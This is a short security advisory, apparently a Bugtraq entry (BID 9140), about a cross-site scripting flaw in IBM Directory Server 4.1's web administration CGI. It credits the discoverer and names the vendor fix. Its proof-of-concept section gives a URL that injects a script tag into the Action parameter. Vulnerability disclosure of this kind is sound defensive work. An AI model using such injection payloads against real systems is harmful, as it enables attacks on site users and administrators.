IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
BID:9140
Info
IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
| Bugtraq ID: | 9140 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 02 2003 12:00AM |
| Updated: | Apr 07 2006 08:12PM |
| Credit: | Discovery is credited to "Oliver Karow" <[email protected]>. |
| Vulnerable: |
IBM Directory Server 4.1 |
| Not Vulnerable: | |
Discussion
Exploit / POC
IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
An exploit is not required. The following example was provided:
https://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script>
An exploit is not required. The following example was provided:
https://www.example.com/ldap/cgi-bin/ldacgi.exe?Action=<script>alert("foo")</script>
Solution / Fix
IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
Solution:
The vendor has released APAR IR52841 as part of IBM Directory Server 4.1 Fix Pack 3 to address this issue.
IBM Directory Server 4.1
Solution:
The vendor has released APAR IR52841 as part of IBM Directory Server 4.1 Fix Pack 3 to address this issue.
IBM Directory Server 4.1
References
IBM Directory Server Web Administration Interface Cross-Site Scripting Vulnerability
References:
References: